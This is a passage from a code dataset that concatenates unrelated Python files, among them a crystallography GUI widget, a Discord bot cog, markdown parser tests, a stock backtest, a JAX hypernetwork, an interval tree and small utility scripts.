np.empty((0,))\n self.picked = np.empty((0, 3))\n\n self.current_hkl_index = 0\n self.current_spots = np.empty((0,))\n self.last_eta = None\n self.last_ome = None\n self.last_hkl_index = None\n\n self.setup_connections()\n\n def setup_connections(self):\n self.ui.current_slider.valueChanged.connect(\n self.current_slider_value_changed)\n\n self.ui.current_angle.valueChanged.connect(\n self.current_angle_value_changed)\n\n self.ui.add_button.clicked.connect(self.add_current)\n\n self.ui.picked_table.selectionModel().selectionChanged.connect(\n self.picked_table_selection_changed)\n\n self.ui.delete_selected.clicked.connect(self.deleted_selected_rows)\n\n self.ui.fiber_step.valueChanged.connect(self.fiber_step_value_changed)\n\n self.canvas.mpl_connect('button_press_event', self.plot_clicked)\n\n def update_gui(self):\n self.ui.current_slider.setRange(0, self.num_picked - 1)\n self.ui.current_angle.setSingleStep(self.fiber_step)\n\n @property\n def active(self):\n return self._active\n\n @active.setter\n def active(self, v):\n if self._active == v:\n return\n\n self._active = v\n\n self.clear_generated()\n self.clear_selected_artists()\n self.select_rows([])\n\n def clear_generated(self):\n # Reset the latest picks to None\n self.last_eta = None\n self.last_ome = None\n self.last_hkl_index = None\n\n self.generated = np.empty((0,))\n self.ui.current_slider.setValue(0)\n # In case the value didn't change. This shouldn't be expensive,\n # so it's okay to run it twice.\n self.update_current()\n\n def plot_clicked(self, event):\n if not self.active:\n # If this widget is inactive, just return\n return\n\n if not event.button == 3:\n # We only hand pick on right-click\n return\n\n self.last_eta = event.xdata\n self.last_ome = event.ydata\n self.last_hkl_index = self.current_hkl_index\n\n self.recreate_generated()\n\n def recreate_generated(self):\n pick_coords = (self.last_eta, self.last_ome)\n if any(x is None for x in pick_coords):\n # No picked coords. Just return.\n return\n\n hkl_index = self.last_hkl_index\n if hkl_index is None or hkl_index >= len(self.data.dataStore):\n # Invalid hkl index. Return.\n return\n\n instr = create_hedm_instrument()\n\n kwargs = {\n 'pick_coords': pick_coords,\n 'eta_ome_maps': self.data,\n 'map_index': hkl_index,\n 'step': self.fiber_step,\n 'beam_vec': instr.beam_vector,\n 'chi': instr.chi,\n 'as_expmap': True,\n }\n self.generated = _pick_to_fiber(**kwargs)\n\n self.ui.current_slider.setValue(0)\n # In case the value didn't change. This shouldn't be expensive,\n # so it's okay to run it twice.\n self.update_current()\n\n def update_current(self):\n enable = len(self.generated) > 0\n\n enable_list = [\n self.ui.current_slider,\n self.ui.current_angle,\n self.ui.current_orientation_0,\n self.ui.current_orientation_1,\n self.ui.current_orientation_2,\n self.ui.add_button,\n ]\n for w in enable_list:\n w.setEnabled(enable)\n\n for i, v in enumerate(self.current_orientation):\n w = getattr(self.ui, f'current_orientation_{i}')\n w.setValue(v)\n\n angle = self.current_index * self.fiber_step\n self.ui.current_angle.setValue(angle)\n\n self.generate_current_spots()\n self.update_current_plot()\n\n def generate_current_spots(self):\n if self.current_index >= len(self.generated):\n fibers = []\n else:\n fibers = self.generated[self.current_index]\n\n self.current_spots = self.general_spots(fibers)\n\n def general_spots(self, fibers):\n if len(fibers) == 0:\n return np.empty((0,))\n\n kwargs = {\n 'instr': create_hedm_instrument(),\n 'eta_ome_maps': self.data,\n 'orientation': fibers,\n }\n return _angles_from_orientation(**kwargs)\n\n def clear_current_plot(self):\n if hasattr(self, '_current_lines'):\n self._current_lines.remove()\n del self._current_lines\n\n def update_current_plot(self):\n self.clear_current_plot()\n hkl_idx = self.current_hkl_index\n if len(self.current_spots) <= hkl_idx:\n self.draw()\n return\n\n current = self.current_spots[hkl_idx]\n if current.size:\n kwargs = {\n 'x': current[:, 0],\n 'y': current[:, 1],\n 's': 36,\n 'c': 'm',\n 'marker': '+',\n }\n self._current_lines = self.ax.scatter(**kwargs)\n\n self.draw()\n\n @property\n def current_orientation(self):\n if len(self.generated) == 0:\n return np.array([0, 0, 0])\n\n return self.generated[self.current_index]\n\n @property\n def current_index(self):\n return self.ui.current_slider.value()\n\n def current_slider_value_changed(self):\n self.update_current()\n\n def current_angle_value_changed(self, v):\n new_slider_index = round(v / self.fiber_step)\n self.ui.current_slider.setValue(new_slider_index)\n\n # This usually already happens, but make sure the angle gets\n # updated to its new value (it may need to round to the nearest).\n angle = self.current_index * self.fiber_step\n self.ui.current_angle.setValue(angle)\n\n def add_current(self):\n to_stack = (self.picked, self.current_orientation)\n self.picked = np.vstack(to_stack)\n self.update_picked_table()\n\n self.clear_generated()\n\n table = self.ui.picked_table\n last_row = table.rowCount() - 1\n self.select_rows([last_row])\n\n def update_picked_table(self):\n table = self.ui.picked_table\n table.clearContents()\n table.setColumnCount(3)\n table.setRowCount(len(self.picked))\n for i, orientation in enumerate(self.picked):\n for j in range(3):\n item = QTableWidgetItem(f'{orientation[j]:.4f}')\n item.setTextAlignment(Qt.AlignCenter)\n item.setFlags(item.flags() & ~Qt.ItemIsEditable)\n table.setItem(i, j, item)\n\n @property\n def picked_quaternions(self):\n # We store these as 3D exp maps. Convert and return as quaternions.\n quats = quatOfExpMap(self.picked.T)\n if quats.ndim == 1:\n # quatOfExpMap() squeezes the output. We must reshape it.\n quats = np.atleast_2d(quats).T\n\n return quats\n\n @property\n def picked(self):\n return self._picked\n\n @picked.setter\n def picked(self, v):\n self._picked = v\n # Clear the cache for hand picked spots\n self.cached_picked_spots.clear()\n\n def clear_selected_artists(self):\n lines = getattr(self, '_selected_artists', [])\n while lines:\n lines.pop(0).remove()\n\n @property\n def selected_rows(self):\n selected = self.ui.picked_table.selectionModel().selectedRows()\n selected = [] if None else selected\n return [x.row() for x in selected]\n\n def picked_table_selection_changed(self):\n self.draw_selected()\n\n enable_delete = len(self.selected_rows) > 0\n self.ui.delete_selected.setEnabled(enable_delete)\n\n def spots_for_hand_picked_quaternion(self, i):\n if i >= len(self.picked):\n return None\n\n cache = self.cached_picked_spots\n\n # Check the cache first. If not present, add to the cache.\n if i not in cache:\n fiber = self.picked[i]\n if not fiber.size:\n return None\n\n cache[i] = self.general_spots(fiber)\n\n return cache[i][self.current_hkl_index]\n\n def draw_selected(self):\n self.clear_selected_artists()\n\n artists = []\n for i in self.selected_rows:\n spots = self.spots_for_hand_picked_quaternion(i)\n if spots is None or spots.size == 0:\n continue\n\n kwargs = {\n 'x': spots[:, 0],\n 'y': spots[:, 1],\n 's': 36,\n 'marker': 'o',\n 'facecolors': 'none',\n 'edgecolors': 'c',\n 'linewidths': 1,\n }\n artists.append(self.ax.scatter(**kwargs))\n\n self._selected_artists = artists\n self.draw()\n\n def select_rows(self, rows):\n table = self.ui.picked_table\n selection_model = table.selectionModel()\n\n with block_signals(selection_model):\n selection_model.clearSelection()\n command = QItemSelectionModel.Select | QItemSelectionModel.Rows\n\n for i in rows:\n if i is None or i >= table.rowCount():\n # Out of range. Don't do anything.\n continue\n\n # Select the row\n model_index = selection_model.model().index(i, 0)\n selection_model.select(model_index, command)\n\n self.picked_table_selection_changed()\n\n def deleted_selected_rows(self):\n self.picked = np.delete(self.picked, self.selected_rows, 0)\n # There should be no selection now\n self.select_rows([])\n self.update_picked_table()\n\n def fiber_step_value_changed(self, v):\n prev_angle = self.ui.current_angle.value()\n\n self.ui.current_slider.setRange(0, self.num_picked - 1)\n self.ui.current_angle.setSingleStep(self.fiber_step)\n\n if self.active:\n # Re-create the generated fibers\n # Restore the closest value to the previous angle\n self.recreate_generated()\n self.ui.current_angle.setValue(prev_angle)\n\n self.fiber_step_modified.emit(v)\n\n @property\n def fiber_step(self):\n return self.ui.fiber_step.value()\n\n @fiber_step.setter\n def fiber_step(self, v):\n self.ui.fiber_step.setValue(v)\n\n @property\n def num_picked(self):\n return round(360 / self.fiber_step)\n\n def draw(self):\n self.canvas.draw()\n","repo_name":"HEXRD/hexrdgui","sub_path":"hexrdgui/hand_picked_fibers_widget.py","file_name":"hand_picked_fibers_widget.py","file_ext":"py","file_size_in_byte":11286,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"18"} +{"seq_id":"18193056698","text":"# 기존 풀이\n# def solution(cards1, cards2, goal):\n# answer = ''\n# n1 = 0\n# n2 = 0\n# for i in goal:\n# if i == cards1[n1]:\n# if n1 < len(cards1)-1:\n# n1 += 1\n# elif i == cards2[n2]:\n# if n2 < len(cards2)-1:\n# n2 += 1\n# else:\n# answer = 'No'\n# break\n# # print(n1, n2)\n# answer = 'Yes'\n# return answer\n\n\n# pop 사용\ndef solution(cards1, cards2, goal):\n for i in goal:\n if len(cards1) > 0 and i == cards1[0]:\n cards1.pop(0) \n elif len(cards2) >0 and i == cards2[0]:\n cards2.pop(0)\n else:\n return \"No\"\n # print(cards1, cards2, i)\n return \"Yes\"\n","repo_name":"SoominRyu/Algorithm","sub_path":"프로그래머스/unrated/159994. 카드 뭉치/카드 뭉치.py","file_name":"카드 뭉치.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74279783402","text":"\"\"\"\nSend a request to a URL, display response body, and handle error codes.\n\nThis script takes a URL as input, sends a request to the URL, displays the body of\nthe response, and prints an error code if the HTTP status code is greater than or\nequal to 400.\n\nUsage:\n python script.py \n\nArgs:\n URL (str): The URL to send the request to.\n\nExample:\n python script.py http://0.0.0.0:5000\n\"\"\"\n\nimport requests\nimport sys\n\n\ndef main():\n url = sys.argv[1]\n \n response = requests.get(url)\n responsebody = response.text\n \n if response.status_code > 400:\n print(\"Error code: {}\".format(response.status_code))\n else:\n print(responsebody)\nif __name__==\"__main__\":\n main()\n\n ","repo_name":"NormanDee510/alx_python","sub_path":"python-network_1/4-error_code.py","file_name":"4-error_code.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36099423756","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n# 根据参数寻优,画出热力图,找出最稳定的参数;\n# 首先参数寻优的rsrs策略\n\nMon 2018/09/03\n\n@author: Tracy Zhu\n\"\"\"\n\nimport sys\n\n# 导入用户库\nsys.path.append(\"..\")\nfrom techiniacl_analysis_stock.rsrs_research import *\n\n\nstart_date = '2008-01-01'\nend_date = '2018-11-12'\nS = 0.7\ncontext = Context(start_date, end_date, S)\nN_list = range(10, 40)\nM_list = range(100, 400, 20)\ndata = get_index_data(\"000905.SH\", start_date, end_date)\ndata = data[['time', 'code', 'open', 'high', 'low', 'close']]\ndata.rename(columns={'time': 'tradeday', 'code': 'sec_code', 'open': 'open_slice', 'high': 'high_slice',\n 'low': 'low_slice', 'close': 'close_slice'}, inplace=True)\ndata['trade_dir'] = -1\n\nreturn_dict = dict()\nsharpe_dict = dict()\ndrawback_dict = dict()\nfor N in N_list:\n for M in M_list:\n print(M, N)\n data_ind = RSRS(data, N, M, S=0.7, ndays=5)\n data_ind = data_ind[data_ind.sec_code == '000905.SH']\n indicator_series = Series(data_ind['rsrs_std_cor_right'].values, index=data_ind.tradeday)\n indicator_series = indicator_series.dropna()\n context = Context(start_date, end_date, S)\n holding_cumprod_pct, index_cumprod_pct, total_fee = back_test_by_indicator(indicator_series, context)\n annulized_return, sharpe_ratio, max_drowback = calc_evaluation_index(holding_cumprod_pct)\n return_dict[N, M] = annulized_return\n sharpe_dict[N, M] = sharpe_ratio\n drawback_dict[N, M] = max_drowback\n\n\ndef convert_dict_df(temp_dict):\n \"将上述变成的dict转化成df\"\n res_df = pd.DataFrame(temp_dict, index=[0]).T.reset_index()\n res_df.columns = ['N', 'M', 'return']\n res_mat = res_df.set_index(['N', 'M'])['return'].unstack()\n res_mat = res_mat.T\n return res_mat\n\nres_mat = convert_dict_df(return_dict)\ndrawback_mat = convert_dict_df(drawback_dict)\nsharpe_mat = convert_dict_df(sharpe_dict)\ncmap = sns.color_palette(\"RdBu_r\", 40)\nfig = plt.figure(figsize=(12, 8))\nax2 = plt.subplot(111)\nsns.heatmap(res_mat, yticklabels=True, annot=True, cmap=cmap, linecolor='black', linewidths=0.05, ax=ax2, cbar=True)\n# ax2.set_title(ths_time)\nplt.yticks(rotation=0)\n#\nplt.savefig('./plot1/' + 'heatmap_try22.png')","repo_name":"tracy-zhu/pratice_project","sub_path":"stock_backtest/parameter_optimization.py","file_name":"parameter_optimization.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"36875999857","text":"import logging\n\nfrom discord import ApplicationContext, Embed, Interaction, Message, WebhookMessage, slash_command\nfrom discord.ext import commands\n\nfrom src.bot import Bot\nfrom src.core import settings\n\nlogger = logging.getLogger(__name__)\n\n\nclass OtherCog(commands.Cog):\n \"\"\"Ban related commands.\"\"\"\n\n def __init__(self, bot: Bot):\n self.bot = bot\n\n @slash_command(guild_ids=settings.guild_ids, description=\"A simple reply stating hints are not allowed.\")\n async def no_hints(\n self, ctx: ApplicationContext\n ) -> Message:\n \"\"\"A simple reply stating hints are not allowed.\"\"\"\n return await ctx.respond(\n \"No hints are allowed for the duration the event is going on. This is a competitive event with prizes. \"\n \"Once the event is over you are more then welcome to share solutions/write-ups/etc and try them in the \"\n \"After Party event.\"\n )\n @slash_command(guild_ids=settings.guild_ids, description=\"A simple reply proving a link to the support desk article on how to get support\")\n @commands.cooldown(1, 60, commands.BucketType.user)\n async def support(\n self, ctx: ApplicationContext\n ) -> Message:\n \"\"\"A simple reply proving a link to the support desk article on how to get support\"\"\"\n return await ctx.respond(\n \"https://help.hackthebox.com/en/articles/5986762-contacting-htb-support\"\n )\n @slash_command(guild_ids=settings.guild_ids, description=\"Add the URL which has spoiler link.\")\n async def spoiler(self, ctx: ApplicationContext, url: str) -> Interaction | WebhookMessage:\n \"\"\"Add the URL which has spoiler link.\"\"\"\n if len(url) == 0:\n return await ctx.respond(\"Please provide the spoiler URL.\")\n\n embed = Embed(title=\"Spoiler Report\", color=0xB98700)\n embed.add_field(name=f\"{ctx.user} has submitted a spoiler.\", value=f\"URL: <{url}>\", inline=False)\n\n channel = self.bot.get_channel(settings.channels.SPOILER)\n await channel.send(embed=embed)\n return await ctx.respond(\"Thanks for the reporting the spoiler.\", ephemeral=True, delete_after=15)\n\n\ndef setup(bot: Bot) -> None:\n \"\"\"Load the `ChannelManageCog` cog.\"\"\"\n bot.add_cog(OtherCog(bot))\n","repo_name":"hackthebox/Hackster","sub_path":"src/cmds/core/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"19"} +{"seq_id":"9387868938","text":"def get_sp500():\n f = open('sp500.txt','r')\n\n lines = f.readlines()\n\n f.close()\n\n syms = list()\n for line in lines[1:]: \n line = line.replace('\\t',' ')\n sym = line.split(' ')\n syms.append(sym[0])\n\n return syms\n","repo_name":"benjiqq/Polymarkets","sub_path":"manage/fetch/sp.py","file_name":"sp.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"1358181448","text":"import re\nimport mistune\nfrom mistune.util import html\nfrom tests import BaseTestCase\nIGNORE_CASES = {'setext_headings_002', 'setext_headings_015',\n 'setext_headings_003', 'setext_headings_007', 'setext_headings_013',\n 'html_blocks_039', 'link_reference_definitions_019', 'block_quotes_008',\n 'list_items_005', 'list_items_024', 'list_items_028', 'list_items_039',\n 'list_items_040', 'list_items_041', 'lists_007', 'lists_016',\n 'lists_017', 'lists_018', 'lists_019', 'block_quotes_005',\n 'block_quotes_006', 'block_quotes_011', 'block_quotes_020',\n 'block_quotes_023', 'block_quotes_024', 'code_spans_009',\n 'code_spans_010', 'entity_and_numeric_character_references_004',\n 'entity_and_numeric_character_references_005', 'links_029', 'links_031',\n 'links_034', 'links_037', 'links_038', 'links_039', 'links_043',\n 'links_045', 'links_046', 'links_047', 'links_049', 'links_050',\n 'links_051', 'links_064', 'links_065', 'links_077', 'images_002',\n 'images_003', 'images_004', 'images_005', 'images_006', 'images_014',\n 'images_018', 'autolinks_002'}\nINSANE_CASES = {'fenced_code_blocks_013', 'fenced_code_blocks_015',\n 'list_items_033', 'list_items_038', 'link_reference_definitions_002',\n 'link_reference_definitions_003', 'link_reference_definitions_004',\n 'link_reference_definitions_005', 'link_reference_definitions_007',\n 'link_reference_definitions_021', 'links_025', 'links_032', 'links_033',\n 'links_041', 'links_060', 'links_082', 'links_084'}\nif html is None:\n PY2_IGNORES = {'entity_and_numeric_character_references_001',\n 'entity_and_numeric_character_references_002',\n 'entity_and_numeric_character_references_003',\n 'entity_and_numeric_character_references_008',\n 'entity_and_numeric_character_references_009',\n 'entity_and_numeric_character_references_010', 'links_016', 'links_019'\n }\nelse:\n PY2_IGNORES = []\nDIFFERENCES = {'tabs_005': lambda s: s.replace(' ', ''),\n 'tabs_006': lambda s: s.replace(' ', ''), 'tabs_007': lambda\n s: s.replace(' ', '')}\nPASSED = {'tabs', 'thematic', 'atx', 'setext', 'indented', 'fenced',\n 'html_blocks', 'link_ref', 'paragraphs', 'blank_lines', 'block_quotes',\n 'list_items', 'lists', 'backslash', 'entity', 'code_spans', 'links',\n 'images', 'autolinks', 'raw_html', 'hard_line', 'soft_line', 'textual'}\n\n\nclass TestCommonMark(BaseTestCase):\n\n @classmethod\n def ignore_case(cls, n):\n if n.startswith('emphasis'):\n return True\n if PY2_IGNORES and n in PY2_IGNORES:\n return True\n return n in IGNORE_CASES or n in INSANE_CASES\n\n def assert_case(self, n, text, html):\n result = mistune.html(text)\n result = re.sub('\\\\s*\\\\n+\\\\s*', '\\n', result)\n result = re.sub('>\\\\n', '>', result)\n result = re.sub('\\\\n<', '<', result)\n expect = re.sub('\\\\s*\\\\n+\\\\s*', '\\n', html)\n expect = re.sub('>\\\\n', '>', expect)\n expect = re.sub('\\\\n<', '<', expect)\n if n in DIFFERENCES:\n expect = DIFFERENCES[n](expect)\n self.assertEqual(result, expect)\n\n\nTestCommonMark.load_fixtures('commonmark.txt')\n","repo_name":"SchoofsEbert/AmPyfier_evaluation","sub_path":"mistune/test_commonmark_ampyfier.py","file_name":"test_commonmark_ampyfier.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20594486953","text":"import keyboard\r\nimport time\r\nimport pyfiglet\r\n\r\ndef Main():\r\n Title = pyfiglet.figlet_format(\"Demins autosend\")\r\n\r\n print(f\"{Title}\")\r\n Message = str(input(\"What would you like to send? \"))\r\n \r\n while True:\r\n Delay = input(\"Delay in seconds? \")\r\n \r\n try:\r\n Delay = int(Delay)\r\n break\r\n except ValueError:\r\n print(\"The delay is not a valid integer.\")\r\n \r\n def AutoSend():\r\n print(\"\\nStarting script in 3s...\")\r\n time.sleep(3)\r\n print(\"Running\")\r\n while True:\r\n keyboard.write(Message)\r\n keyboard.send(\"enter\")\r\n print(\"Typed message\")\r\n time.sleep(Delay)\r\n \r\n Start = input(\"\\nWould you like to start the script..? (Y/N) \")\r\n if Start.lower() == \"y\":\r\n AutoSend()\r\n else:\r\n return\r\n \r\nMain()","repo_name":"DemonMan123/AutoSend","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42790212433","text":"from django.conf import settings\nfrom django.db import models\nfrom django_extensions.db.fields import UUIDField\n\n\nclass Tenant(models.Model):\n \"\"\"Information about the tenants in Goldstone.\n\n If storing tenant settings here becomes unwieldy, we'll normalize them into\n a separate table.\n\n \"\"\"\n\n name = models.CharField(max_length=settings.TENANT_NAME_MAX_LENGTH,\n unique=True)\n owner = models.CharField(max_length=settings.TENANT_OWNER_MAX_LENGTH,\n help_text=\"The name of the tenant's owner\")\n owner_contact = \\\n models.TextField(blank=True,\n help_text=\"The owner's contact information\")\n\n # This allows URLs to identify a row using a UUID value.\n uuid = UUIDField(auto=True)\n\n def __unicode__(self):\n \"\"\"Return a useful string.\"\"\"\n\n return u'%s owned by %s' % (self.name, self.owner)\n\n\nclass Cloud(models.Model):\n \"\"\"Information about the clouds, e.g., OpenStack, which are owned by\n Goldstone tenants.\"\"\"\n\n # This is the cloud's name, not the name of the owning Goldstone tenant!\n tenant_name = models.CharField(max_length=settings.OS_NAME_MAX_LENGTH)\n username = models.CharField(max_length=settings.OS_USERNAME_MAX_LENGTH)\n password = models.CharField(max_length=settings.OS_PASSWORD_MAX_LENGTH)\n auth_url = models.CharField(max_length=settings.OS_AUTH_URL_MAX_LENGTH)\n\n # A Goldstone tenant may have multiple clouds.\n tenant = models.ForeignKey(Tenant)\n\n # This allows URLs to identify a row using a UUID value.\n uuid = UUIDField(auto=True)\n\n class Meta: # pylint: disable=C1001,C0111,W0232\n unique_together = (\"tenant_name\", \"username\", \"tenant\")\n\n def __unicode__(self):\n \"\"\"Return a useful string.\"\"\"\n\n return u'%s, contained in %s' % (self.tenant_name, self.tenant.name)\n","repo_name":"Solinea/goldstone-server","sub_path":"goldstone/tenants/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"20860745843","text":"from django.conf.urls import url, include\nfrom views import post_list,post_create,post_delete,post_detail,post_update\n\nurlpatterns=[\n\n # post-list\n url(r'^$',post_list,name=\"post-list\"),\n # post-create\n url(r'^create/$',post_create,name=\"post-create\"),\n #post-detail\n url(r'^(?P[\\w-]+)/$',post_detail,name=\"post-detail\"),\n #post-delete\n url(r'^(?P[\\w-]+)/delete/$',post_delete,name=\"post-delete\"),\n #post-update\n url(r'^(?P[\\w-]+)/edit/$',post_update,name=\"post-update\"),\n\n\n]","repo_name":"strar-buck/my-blog","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39864565738","text":"import jax\nimport jax.tree_util as tree\nimport jax.numpy as jnp\nimport haiku as hk\n\nclass DynamicHypernetwork(hk.Module):\n \"\"\"\n Hypernetwork that takes the current batch as inputs, averages the samples, and then uses that average to predict weights for the layer.\n\n This will be modified soon such that it contains a dynamic hypernet for a single input\n that is then vmapped over the batch axis.\n \"\"\"\n\n def __init__(self, embedding_dim, latent_dim, network_params):\n super().__init__()\n # PyTree data needed to reconstruct net\n self.tgt_treedef = tree.tree_structure(network_params)\n self.tgt_sizes = tree.tree_map(jnp.size, network_params)\n self.num_tgt_layers = len(tree.tree_leaves(network_params))\n self.target_layer_shapes = tree.tree_map(jnp.shape, network_params)\n \n # hypernetwork dimensions\n self.embedding_dim = embedding_dim\n self.latent_dim = latent_dim\n \n def __call__(self, x):\n avg = jnp.mean(x, axis=0)\n layer_inputs = jnp.repeat(jnp.expand_dims(avg, 0), self.num_tgt_layers, 0)\n projections = hk.nets.MLP([self.embedding_dim, self.latent_dim, self.latent_dim])(layer_inputs)\n\n layer_projections = jnp.split(projections, self.num_tgt_layers)\n \n rebuilt_tree = tree.tree_unflatten(self.tgt_treedef, layer_projections)\n resized_tree = tree.tree_map(lambda layer, size: jnp.pad(layer[1,:size], \n (0,max(0,size-layer.size)), \n mode=\"wrap\"), \n rebuilt_tree, \n self.tgt_sizes\n )\n net = tree.tree_map(jnp.reshape, resized_tree, self.target_layer_shapes)\n return net","repo_name":"kmheckel/synecdoche","sub_path":"synecdoche/experimental.py","file_name":"experimental.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"70974201963","text":"\nclass IntervalNode(object):\n\tdef __init__(self, lo, hi):\n\t\tself.lo = lo\n\t\tself.hi = hi\n\t\tself.max = hi\n\t\tself.left = None\n\t\tself.right = None\n\n\tdef __str__(self):\n\t\treturn \"Node({}, {}, {})\".format(self.lo, self.hi, self.max)\n\nclass IntervalTree(object):\n\tdef __init__(self):\n\t\tself.root = None\n\n\tdef insert(self, lo, hi):\n\t\tif self.root is None:\n\t\t\tself.root = IntervalNode(lo, hi)\n\t\t\treturn self.root\n\n\t\tself.insert_helper(self.root, lo, hi)\n\n\tdef insert_helper(self, node, lo, hi):\n\t\tif node is None:\n\t\t\treturn IntervalNode(lo, hi)\n\n\t\tif lo < node.lo:\n\t\t\tnode.left = self.insert_helper(node.left, lo, hi)\n\t\telse:\n\t\t\tnode.right = self.insert_helper(node.right, lo, hi)\n\n\t\tnode.max = max(node.hi, hi)\n\t\treturn node\n\n\tdef is_overlap(self, lo, hi):\n\t\treturn self.is_overlap_helper(self.root, lo, hi)\n\n\tdef is_overlap_helper(self, node, lo, hi):\n\t\tif node is None:\n\t\t\treturn None\n\n\t\tif lo < node.hi and node.lo < hi:\n\t\t\treturn node\n\n\t\tif node.left and node.left.max > lo:\n\t\t\treturn self.is_overlap_helper(node.left, lo, hi)\n\t\telse:\n\t\t\treturn self.is_overlap_helper(node.right, lo, hi)\n\nif __name__ == '__main__':\n\tit = IntervalTree()\n\tit.insert(10, 15)\n\tit.insert(11, 13)\n\tit.insert(18, 21)\n\tit.insert(20, 25)\n\tit.insert(0, 7)\n\n\tprint(it.is_overlap(8, 9))\n\tprint(it.is_overlap(17, 17))\n\tprint(it.is_overlap(21, 22))\n\tprint(it.is_overlap(21, 22))\n\tprint(it.is_overlap(12, 18))\n\tprint(it.is_overlap(24, 26))\n\n","repo_name":"kanghuawu/Algorithm","sub_path":"python/tree/interval_tree.py","file_name":"interval_tree.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"18307852621","text":"#!/usr/bin/env python3\n\nimport pyglet\nimport glooey\nimport run_demos\n\nwindow = pyglet.window.Window()\ngui = glooey.Gui(window)\nbin = glooey.Bin()\nwidget = glooey.Placeholder(100, 100)\n\nbin.add(widget)\ngui.add(bin)\n\n@run_demos.on_space(gui) \ndef test_bin():\n bin.add(widget)\n yield \"Put a widget in the bin.\"\n bin.clear()\n yield \"Clear the bin.\"\n\n\npyglet.app.run()\n\n\n","repo_name":"MichaelSinsbeck/glooey","sub_path":"tests/containers/demo_bin.py","file_name":"demo_bin.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"20386305237","text":"from utils import *\nimport numpy as np\nimport pandas as pd\nimport joblib\n'''\ntrain_xy.Date = pd.to_datetime(train_xy.Date)\ntrain_xy['Date'] = train_xy['Date'].dt.strftime(\"%Y%m%d\").astype(int)\n'''\nfrom lightgbm import LGBMRegressor,LGBMRanker\nimport xgboost as xgb\nfrom xgboost import plot_importance\nimport matplotlib.pyplot as plt\nimport warnings,tqdm,re,copy\nwarnings.filterwarnings(\"ignore\")\ntrain_fin = pd.read_csv(\"./train_files/financials.csv\",low_memory=False) #各个季度的季度情况\ntrain_op = pd.read_csv(\"./train_files/options.csv\",low_memory=False)\ntrain_sec_pr = pd.read_csv(\"./train_files/secondary_stock_prices.csv\",low_memory=False)#.rename(columns={'RowId':'DateCode'})\ntrain_pr = pd.read_csv(\"./train_files/stock_prices.csv\",low_memory=False)\ntrain_trd = pd.read_csv(\"./train_files/trades.csv\",low_memory=False).dropna(how='any').reset_index(drop=True) #前一个交易周的市场总交易情况\n\nstock_list = pd.read_csv(\"stock_list.csv\",low_memory=False).rename(columns={'Section/Products':'Section','Close':'Close_MarketCapitalization'})\nfor f in [\"17SectorName\",\"17SectorCode\",\"33SectorName\",\"33SectorCode\"]:\n stock_list[f] = stock_list[f].apply(lambda x:np.nan if x=='-' else x.strip())\nvalid_fin = pd.read_csv(\"./supplemental_files/financials.csv\",low_memory=False) #各个季度的季度情况\nvalid_op = pd.read_csv(\"./supplemental_files/options.csv\",low_memory=False)\nvalid_sec_pr = pd.read_csv(\"./supplemental_files/secondary_stock_prices.csv\",low_memory=False)\nvalid_pr = pd.read_csv(\"./supplemental_files/stock_prices.csv\",low_memory=False)\nvalid_trd = pd.read_csv(\"./supplemental_files/trades.csv\",low_memory=False).dropna(how='any').reset_index(drop=True)\n\nSecurities_Code_L = set(train_pr[\"SecuritiesCode\"].unique().tolist() )\n\ndef reduce_mem(df): # 节约内存的一个标配函数\n starttime=time.time()\n numerics=['int16','int32','int64','float16','float32','float64']\n start_mem=df.memory_usage().sum()/1024**2\n for col in df.columns:\n col_type=df[col].dtypes\n if col_type in numerics:\n c_min=df[col].min()\n c_max=df[col].max()\n else:continue\n if pd.isnull(c_min) or pd.isnull(c_max):continue\n if str(col_type)[:3]=='int':\n if c_min>np.iinfo(np.int8).min and c_max np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64)\n else:\n if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:\n df[col] = df[col].astype(np.float16)\n elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n end_mem = df.memory_usage().sum() / 1024**2\n #print('-- Mem. usage decreased to {:5.2f} Mb ({:.1f}% reduction),time spend:{:2.2f} min'.format(end_mem,100*(start_mem-end_mem)/start_mem, (time.time()-starttime)/60))\n return df\ndef month_add(ym0,nm):\n assert len(str(ym0))==6\n ym0 = ym0 + 100*(nm//12) + nm%12 #年月+月份数 的加减法,//为向下取整\n g = int(str(ym0)[-2:])\n if g//12==1:ym0 = 